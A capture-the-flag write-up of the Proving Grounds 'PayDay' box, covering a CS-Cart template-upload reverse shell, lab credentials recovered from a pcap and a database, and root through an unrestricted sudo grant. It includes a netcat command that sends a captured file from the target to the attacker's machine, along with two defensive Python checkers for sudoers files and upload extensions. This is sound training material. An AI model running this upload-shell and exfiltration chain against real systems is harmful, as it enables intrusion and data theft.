PayDay

Source: Proving Grounds
OS: Linux
Community Rating: Intermediate

Enumeration & Reconnaissance

  • My usual autorecon scan revealed several open ports:

    • SSH (22)

    • HTTP (80)

    • POP3 (110)

    • SMB (139 & 445)

    • 993

    • 995

Service Analysis

  • I began by exploring HTTP (80) and discovered a CS-Cart application. A simple login using the default credentials (admin:admin) granted immediate access.

  • I started looking for CVEs and found EDB ID: 48891 (no CVE ID). The issue was quite simple: the application allowed file uploads as templates, and any PHP file could be uploaded if given a ".phtml" extension. This opened the door to remote code execution.

Exploit Steps

Gaining Initial Access

  • I crafted a reverse shell script, renamed it with the .phtml extension, and uploaded it. By navigating to:

http://192.168.192.39/skins/shell.phtml

[Screenshot: Gaining Access]

  • I quickly obtained shell access. Once inside, I uploaded linpeas.sh for further enumeration.

  • linpeas.sh revealed access to the root directory, although the existing .ssh/authorized_keys file was not in a valid format and I couldn't write a new one.

[Screenshot: authorized_keys]
  • A file of interest was capture.cap. I used a neat file transfer method using netcat:

# on my attacking machine (192.168.45.201), started first: listen on 1234 and write what arrives to a file
nc -l -p 1234 -q 1 > capture.cap < /dev/null
# on the target: push the file to that listener
cat capture.cap | netcat 192.168.45.201 1234

[Screenshot: Transferring the pcap File]

  • After analyzing the pcap with Wireshark, I uncovered credentials for a user: brett:ilovesecuritytoo. But wait, there's no user named Brett here! I tried patrick:ilovesecuritytoo and root:ilovesecuritytoo. Nope.

[Screenshot: Password Exposed]
[Screenshot: Spraying the Password]
  • Then I found database creds in a PHP config: root:root.

[Screenshot: db_password]
[Screenshot: MySQL Database Enumeration]

  • I logged into MySQL, dumped the cscart database, and found admin:admin and customer:customer. Seeing a pattern here? Yeah, me neither.

[Screenshot: Users Hashed Passwords]
[Screenshot: Cracked Password]

  • After banging my head against the wall, I looked for hints; it turns out it was just patrick:patrick. The password was literally the username. Take a moment. Breathe. Let that sink in.

Privilege Escalation

  • After switching to the patrick account, I ran:

sudo -l

  • This revealed that I could run any command as root without a password. A quick execution of:

sudo bash

  • provided a root shell, completing the takeover.

[Screenshot: Getting Root]
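The defender-side counterpart of running sudo -l on every account is auditing the sudoers file for the grant this box had: any command as root, with no password. The following is an added example, not code from the writeup or from the box; it parses the common one-line user specification only (aliases, Defaults, #include and line continuations are out of scope by assumption), and the sudoers lines it runs over are constructed, not the box's real file.

```python
"""Audit sudoers user specifications for over-broad root grants.
Added example, not part of the original writeup; sample lines are constructed."""
import re

# One-line user specification:  <user|%group> <hosts>=(<runas>) [TAG:...] <cmd,cmd,...>
# Aliases, Defaults, #include and line continuations are out of scope (assumption).
SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_spec(line: str):
    """Parse one sudoers line. Returns a dict, or None for blanks, comments,
    Defaults and alias definitions."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP_PREFIXES):
        return None
    m = SPEC_RE.match(line)
    if not m:
        return None
    tags = {t for t in re.split(r"[:\s]+", m.group("tags")) if t}
    return {
        "who": m.group("who"),
        "hosts": m.group("hosts"),
        # sudoers runs commands as root when no (runas) list is given
        "runas": (m.group("runas") or "root").strip(),
        "tags": tags,
        "cmds": [c.strip() for c in m.group("cmds").split(",")],
    }


def audit(lines):
    """Return (who, reason) for every spec that lets the subject run ANY
    command as root; the reason notes when no password is required."""
    findings = []
    for raw in lines:
        spec = parse_spec(raw)
        if spec is None:
            continue
        runas_user = spec["runas"].split(":", 1)[0].strip()   # "(ALL:ALL)" -> "ALL"
        reaches_root = runas_user in ("ALL", "root")
        any_command = "ALL" in spec["cmds"]
        if reaches_root and any_command:
            reason = "any command as root"
            if "NOPASSWD" in spec["tags"]:
                reason += ", no password required"
            findings.append((spec["who"], reason))
    return findings


# Constructed sample; the box's real sudoers file is not on the page.
SUDOERS_SAMPLE = """
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%admin   ALL=(ALL) ALL
patrick  ALL=(ALL) NOPASSWD: ALL
brett    ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
www-data ALL=(www-data) NOPASSWD: /usr/bin/php
""".strip().splitlines()

if __name__ == "__main__":
    for who, reason in audit(SUDOERS_SAMPLE):
        print(f"{who}: {reason}")
```

Run it against the output of `cat /etc/sudoers /etc/sudoers.d/*` on a host you administer; the entries for root and %admin are expected, the patrick line is the one that should never appear on a hardened box. Scoped grants such as brett's single systemctl command are deliberately left out of the findings.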

Lessons Learned

  • Password Guessing 101: Never underestimate username:username combos, they’re tragically common.

  • Sudo -l Is Golden: Always check sudo permissions. This box handed root on a silver platter.

  • PCAPs Hide Secrets: Network captures often leak credentials, even if they’re for non-existent users.

  • Template Uploads = Shells: If an app lets you upload "templates," abuse it; .phtml bypasses are clutch.
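To make the last lesson concrete from the defensive side, here is the shape of upload check that lets a .phtml file through beside an allowlist check that does not. This is an added example, not CS-Cart's code or anything from the writeup; the allowlisted template extensions and the sample upload names are constructed for the demonstration.

```python
"""Template-upload filename checks: the denylist style of check that lets
".phtml" through, beside an allowlist check that does not.
Added example, not CS-Cart's code; allowlist and sample names are constructed."""

# Extensions that common Apache + mod_php / php-fpm configurations hand to
# the PHP interpreter. The weak check below only knows about ".php".
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

# What a template-upload endpoint legitimately needs (assumption for this example).
TEMPLATE_ALLOWLIST = {"tpl", "css", "js", "png", "jpg", "gif", "svg"}


def denylist_check(filename: str) -> bool:
    """Weak check: accept anything that does not end in ".php".
    Returns True when the upload would be accepted."""
    return not filename.lower().endswith(".php")


def allowlist_check(filename: str) -> bool:
    """Hardened check. Accepts only a bare filename with exactly one
    extension, and only if that extension (case-insensitive) is on the
    allowlist and is never a PHP extension."""
    if not filename or "/" in filename or "\\" in filename or "\x00" in filename:
        return False                     # no paths, no traversal, no NUL tricks
    if filename.startswith("."):
        return False                     # no dotfiles such as .htaccess
    parts = filename.split(".")
    if len(parts) != 2 or not parts[0]:
        return False                     # no extension, or a double extension (shell.tpl.phtml)
    ext = parts[1].lower()
    if ext in PHP_EXTENSIONS:
        return False                     # belt and braces if the allowlist is ever widened
    return ext in TEMPLATE_ALLOWLIST


def compare(filenames):
    """Map each filename to (denylist_accepts, allowlist_accepts)."""
    return {f: (denylist_check(f), allowlist_check(f)) for f in filenames}


# Constructed upload attempts to run both checks over.
SAMPLE_UPLOADS = ["theme.tpl", "shell.php", "shell.phtml", "SHELL.PHTML",
                  "shell.tpl.phtml", "../shell.tpl", ".htaccess"]

if __name__ == "__main__":
    for name, (weak, strong) in compare(SAMPLE_UPLOADS).items():
        print(f"{name:18} denylist={'accept' if weak else 'reject':6} "
              f"allowlist={'accept' if strong else 'reject'}")
```

The point of the comparison is that the denylist accepts every name except the literal shell.php, while the allowlist rejects the case variant, the double extension, the path component and the dotfile as well. Extension checks belong alongside, not instead of, storing uploads outside the web root with script execution disabled for that directory.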
